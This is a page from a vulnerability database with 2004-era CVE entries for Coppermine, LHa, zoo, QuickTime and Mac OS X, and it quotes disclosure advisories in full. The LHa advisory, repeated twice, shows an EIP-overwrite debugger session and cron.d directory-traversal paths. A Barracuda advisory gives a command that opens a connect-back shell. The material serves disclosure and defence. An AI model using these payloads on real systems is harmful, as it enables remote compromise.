VARIoT IoT vulnerabilities database

VAR-200405-0017 | CVE-2004-0428 | Apple Mac OS X AppleFileServer fails to properly handle certain authentication requests |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unknown vulnerability in CoreFoundation in Mac OS X 10.3.3 and Mac OS X 10.3.3 Server, related to "the handling of an environment variable," has unknown attack vectors and unknown impact. There is a buffer overflow vulnerability in the way Apple's AppleFileServer handles certain authentication requests. This vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code. It has been reported that CoreFoundation is affected by a local unspecified large input vulnerability. This issue is apparently due to an inability of certain library-defined classes to handle large input.
Currently sufficient information does not exist to provide more details. This BID will be updated when more information becomes available.
This issue was previously disclosed in a multiple BID 10268 (Apple OS X Multiple Unspecified Large Input Vulnerabilities), however, it is being assigned a new BID
VAR-200405-0047 | CVE-2004-1984 | Coppermine Photo Gallery Sensitive Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Coppermine Photo Gallery 1.2.2b and 1.2.0 RC4 allows remote attackers to obtain sensitive information via a direct HTTP request to (1) phpinfo.php, (2) addpic.php, (3) config.php, (4) db_input.php, (5) displayecard.php, (6) ecard.php, (7) crop.inc.php, which reveal the full path in a PHP error message. Coppermine Photo Gallery is prone to a information disclosure vulnerability
VAR-200404-0075 | CVE-2004-1985 | Coppermine Photo Gallery Multiple input validation vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via the CPG_URL parameter. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. Remote attackers can use these vulnerabilities to execute arbitrary commands, obtain COOKIE data, and obtain sensitive file paths and other information. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges
VAR-200408-0141 | CVE-2004-0235 | Lha Directory Traversal Vulnerability in Testing and Extracting Process |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path").
The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility.
The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility.
**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency.
**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------
LHa buffer overflows and directory traversal problems
PROGRAM: LHa (Unix version)
VENDOR: various people
VULNERABLE VERSIONS: 1.14d to 1.14i
1.17 (Linux binary)
possibly others
IMMUNE VERSIONS: 1.14i with my patch applied
1.14h with my patch applied
LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm
http://www2m.biglobe.ne.jp/~dolphin/lha/prog/
LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/
REFERENCES: CAN-2004-0234 (buffer overflows)
CAN-2004-0235 (directory traversal)
* DESCRIPTION *
LHa is a console-based program for packing and unpacking LHarc
archives.
It is one of the packages in Red Hat Linux, Fedora Core, SUSE
Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,
Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux.
It is also included in the port/package collections for FreeBSD,
OpenBSD and NetBSD.
* OVERVIEW *
LHa has two stack-based buffer overflows and two directory traversal
problems. They can be abused by malicious people in many different
ways: some mail virus scanners require LHa and run it automatically
on attached files in e-mail messages. Some web applications allow
uploading and unpacking of LHarc archives. Some people set up their
web browsers to start LHa automatically after downloading an LHarc
archive. Finally, social engineering is probably quite effective
in this case.
* TECHNICAL DETAILS *
a) two stack-based buffer overflows
The buffer overflows in LHa occur when testing (t) or extracting
(x) archives where the archive contents have too long filenames
or directory names. The cause of the problem is the function
get_header() in header.c. This function first reads the lengths of
filenames or directory names from the archive, and then it reads
that many bytes to a char array (one for filenames and one for
directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers
including EIP, as you can see in this session capture:
$ lha t buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Segmentation fault
$ lha x buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Segmentation fault
$ gdb lha
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) r x buf_oflow.lha
Starting program: /usr/bin/lha x buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) bt
#0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax 0x4001e4a0 1073865888
ecx 0xffffffe0 -32
edx 0x24 36
ebx 0x55555555 1431655765
esp 0xbfffdd50 0xbfffdd50
ebp 0x55555555 0x55555555
esi 0x55555555 1431655765
edi 0x55555555 1431655765
eip 0x55555555 0x55555555
eflags 0x210282 2163330
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x33 51
(gdb) r t buf_oflow.lha
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/lha t buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) bt
#0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax 0x4001e4a0 1073865888
ecx 0xffffffe0 -32
edx 0x24 36
ebx 0x55555555 1431655765
esp 0xbfffe6d0 0xbfffe6d0
ebp 0x55555555 0x55555555
esi 0x55555555 1431655765
edi 0x55555555 1431655765
eip 0x55555555 0x55555555
eflags 0x210286 2163334
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Exit anyway? (y or n) y
$
b) two directory traversal problems
LHa has directory traversal problems, both with absolute paths
and relative paths. There is no protection against relative paths
at all, so you can simply use the lha binary to create an archive
with paths like "../../../../../etc/cron.d/evil". There is some
simple protection against absolute paths, namely skipping the first
character if it is a slash, but again you can simply use the binary
to create archives with paths like "//etc/cron.d/evil".
* ATTACHED FILES *
I have written a patch against version 1.14i that corrects all
four problems. The patch is included as an attachment, together
with some test archives.
* TIMELINE *
18 Apr: contacted the vendor-sec list and the LHa 1.14 author
18 Apr: tried to contact the LHa 1.17 author with a web form and
a guessed e-mail address which bounced
19 Apr: reply from the vendor-sec list with CVE references
30 Apr: Red Hat released their advisory
01 May: I release this advisory
// Ulf Harnhammar
Advogato diary :: http://www.advogato.org/person/metaur/
idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/
Debian Security Audit Project :: http://shellcode.org/Audit/
------------------------------------------------------------------------
VAR-200404-0077 | CVE-2004-1987 | Coppermine Photo Gallery Multiple Input Validation Vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
picmgmtbatch.inc.php in Coppermine Photo Gallery 1.2.2b and 1.2.0 RC4 allows remote attackers with administrative privileges to execute arbitrary commands via shell metacharacters in the (1) $CONFIG['impath'] or (2) $CONFIG['jpeg_qual'] parameters. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4
VAR-200404-0078 | CVE-2004-1988 | Coppermine Photo Gallery Multiple Input Validation Vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
PHP remote file inclusion vulnerability in init.inc.php in Coppermine Photo Gallery 1.2.0 RC4 allows remote attackers to execute arbitrary PHP code by modifying the CPG_M_DIR to reference a URL on a remote web server that contains functions.inc.php. Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges
VAR-200404-0079 | CVE-2004-1989 | Coppermine Photo Gallery Multiple Input Validation Vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc. Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges
VAR-200408-0140 | CVE-2004-0234 | LHa Vuffer Overflow Vulnerability in Testing and Extracting Process |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive.
The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility.
The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility.
**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency.
**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates.
These vulnerabilities are related to:
SA11510
SA19002
Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------
LHa buffer overflows and directory traversal problems
PROGRAM: LHa (Unix version)
VENDOR: various people
VULNERABLE VERSIONS: 1.14d to 1.14i
1.17 (Linux binary)
possibly others
IMMUNE VERSIONS: 1.14i with my patch applied
1.14h with my patch applied
LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm
http://www2m.biglobe.ne.jp/~dolphin/lha/prog/
LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/
REFERENCES: CAN-2004-0234 (buffer overflows)
CAN-2004-0235 (directory traversal)
* DESCRIPTION *
LHa is a console-based program for packing and unpacking LHarc
archives.
It is one of the packages in Red Hat Linux, Fedora Core, SUSE
Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,
Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux.
It is also included in the port/package collections for FreeBSD,
OpenBSD and NetBSD.
* OVERVIEW *
LHa has two stack-based buffer overflows and two directory traversal
problems. They can be abused by malicious people in many different
ways: some mail virus scanners require LHa and run it automatically
on attached files in e-mail messages. Some web applications allow
uploading and unpacking of LHarc archives. Some people set up their
web browsers to start LHa automatically after downloading an LHarc
archive. Finally, social engineering is probably quite effective
in this case. The cause of the problem is the function
get_header() in header.c. This function first reads the lengths of
filenames or directory names from the archive, and then it reads
that many bytes to a char array (one for filenames and one for
directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers
including EIP, as you can see in this session capture:
$ lha t buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Segmentation fault
$ lha x buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Segmentation fault
$ gdb lha
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) r x buf_oflow.lha
Starting program: /usr/bin/lha x buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) bt
#0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax 0x4001e4a0 1073865888
ecx 0xffffffe0 -32
edx 0x24 36
ebx 0x55555555 1431655765
esp 0xbfffdd50 0xbfffdd50
ebp 0x55555555 0x55555555
esi 0x55555555 1431655765
edi 0x55555555 1431655765
eip 0x55555555 0x55555555
eflags 0x210282 2163330
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x33 51
(gdb) r t buf_oflow.lha
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/lha t buf_oflow.lha
LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) bt
#0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax 0x4001e4a0 1073865888
ecx 0xffffffe0 -32
edx 0x24 36
ebx 0x55555555 1431655765
esp 0xbfffe6d0 0xbfffe6d0
ebp 0x55555555 0x55555555
esi 0x55555555 1431655765
edi 0x55555555 1431655765
eip 0x55555555 0x55555555
eflags 0x210286 2163334
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Exit anyway? (y or n) y
$
b) two directory traversal problems
LHa has directory traversal problems, both with absolute paths
and relative paths. There is no protection against relative paths
at all, so you can simply use the lha binary to create an archive
with paths like "../../../../../etc/cron.d/evil". There is some
simple protection against absolute paths, namely skipping the first
character if it is a slash, but again you can simply use the binary
to create archives with paths like "//etc/cron.d/evil".
* ATTACHED FILES *
I have written a patch against version 1.14i that corrects all
four problems. The patch is included as an attachment, together
with some test archives.
* TIMELINE *
18 Apr: contacted the vendor-sec list and the LHa 1.14 author
18 Apr: tried to contact the LHa 1.17 author with a web form and
a guessed e-mail address which bounced
19 Apr: reply from the vendor-sec list with CVE references
30 Apr: Red Hat released their advisory
01 May: I release this advisory
// Ulf Harnhammar
Advogato diary :: http://www.advogato.org/person/metaur/
idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/
Debian Security Audit Project :: http://shellcode.org/Audit/
------------------------------------------------------------------------
.
TITLE:
Zoo "fullpath()" File Name Handling Buffer Overflow
SECUNIA ADVISORY ID:
SA19002
VERIFY ADVISORY:
http://secunia.com/advisories/19002/
CRITICAL:
Moderately critical
IMPACT:
DoS, System access
WHERE:
>From remote
SOFTWARE:
zoo 2.x
http://secunia.com/product/8297/
DESCRIPTION:
Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo,
which can be exploited by malicious people to cause a DoS (Denial of
Service) and potentially to compromise a user's system. This can be exploited to cause a
buffer overflow when a specially-crafted ZOO archive containing a
file with an overly long file and directory name is processed (e.g.
listing archive contents or adding new files to the archive).
The vulnerability has been confirmed in version 2.10. Other versions
may also be affected.
SOLUTION:
Restrict use to trusted ZOO archives.
PROVIDED AND/OR DISCOVERED BY:
Jean-S\xe9bastien Guay-Leroux
ORIGINAL ADVISORY:
http://www.guay-leroux.com/projects/zoo-advisory.txt
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Topic: Barracuda LHA archiver security bug leads to
remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: http://www.barracudanetworks.com/
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-S\xe9bastien Guay-Leroux
CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.
For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-S\xe9bastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
VAR-200407-0077 | CVE-2004-0431 | Apple QuickTime contains an integer overflow in the "QuickTime.qts" extension |
CVSS V2: 5.1 CVSS V3: - Severity: MEDIUM |
Integer overflow in Apple QuickTime (QuickTime.qts) before 6.5.1 allows attackers to execute arbitrary code via a large "number of entries" field in the sample-to-chunk table data for a .mov movie file, which leads to a heap-based buffer overflow. apple's QuickTime Exists in unspecified vulnerabilities.None.
This issue can be triggered by a malformed .mov file and is reported to be exploitable to execute arbitrary code on Microsoft Windows platforms. This issue could also cause the player to crash on other platforms. Conflicting information has been released by the vendor that suggests that this issue will only result in a denial of service on Mac OS X. Apple QuickTime (QuickTime.qts) Heap Overflow
Release Date:
May 02, 2004
Date Reported:
February 18, 2004
Severity:
High (Code Execution)
Vendor:
Apple
Systems Affected:
Apple QuickTime 6.5
Apple iTunes 4.2.0.72
Description:
The Apple QuickTime media player is used for playing, interacting with
or viewing video, audio, VR or graphics files. Many popular web
browsers, media players, and other applications use their libraries to
play various QuickTime movie formats through their applications. The vulnerability allows a remote attacker to reliably
overwrite heap memory with user-controlled data and execute arbitrary
code within the SYSTEM context.
This specific flaw exists within the QuickTime.qts file which many
applications access QuickTime's functionality through. By specially
crafting atoms within a movie file, a direct heap overwrite is
triggered, and reliable code execution is then possible.
Technical Details:
The code in QuickTime.qts responsible for copying Sample-to-Chunk table
entries from the 'stsc' atom data in a QuickTime-format movie into an
array allocated on the heap. According to developer.apple.com, the
format of the Sample-to-Chunk atom is as follows:
Offset Type Description
------- ------- --------------------------------
0000h DWORD atom size
0004h DWORD atom type tag ('stsc')
0008h BYTE version
0009h BYTE[3] flags
000Ch DWORD number of entries
0010h ... sample-to-chunk table data
The heap block intended to hold the sample-to-chunk table data is
allocated with a size equal to (number_of_entries + 2) * 16. By
supplying the "number of entries" field with the value 0x0FFFFFFE or
greater, an absolutely classic integer overflow results that causes an
insufficiently-sized heap block to be allocated, resulting in an equally
classic complete heap memory overwrite.
It is difficult to express just how textbook this vulnerability scenario
really is. Successful exploitation of the vulnerability is
self-evident, and therefore no further discussion is warranted. It is
our sincere hope that the vendor will make an earnest effort to increase
the maturity of its security response capabilities, so that researchers
will be encouraged to continue to work with them amicably on future
security issues. Apple is doing a disservice to its customers by
incorrectly labeling this vulnerability as a "crash bug" rather than
stating correctly that attackers can compromise systems running the
affected Apple software.
References:
QuickTime: QuickTime File Format
http://developer.apple.com/documentation/QuickTime/QTFF/index.html
Vendor Status:
Apple has released a patch for this vulnerability. The patch is
available via the Updates section of the affected applications.
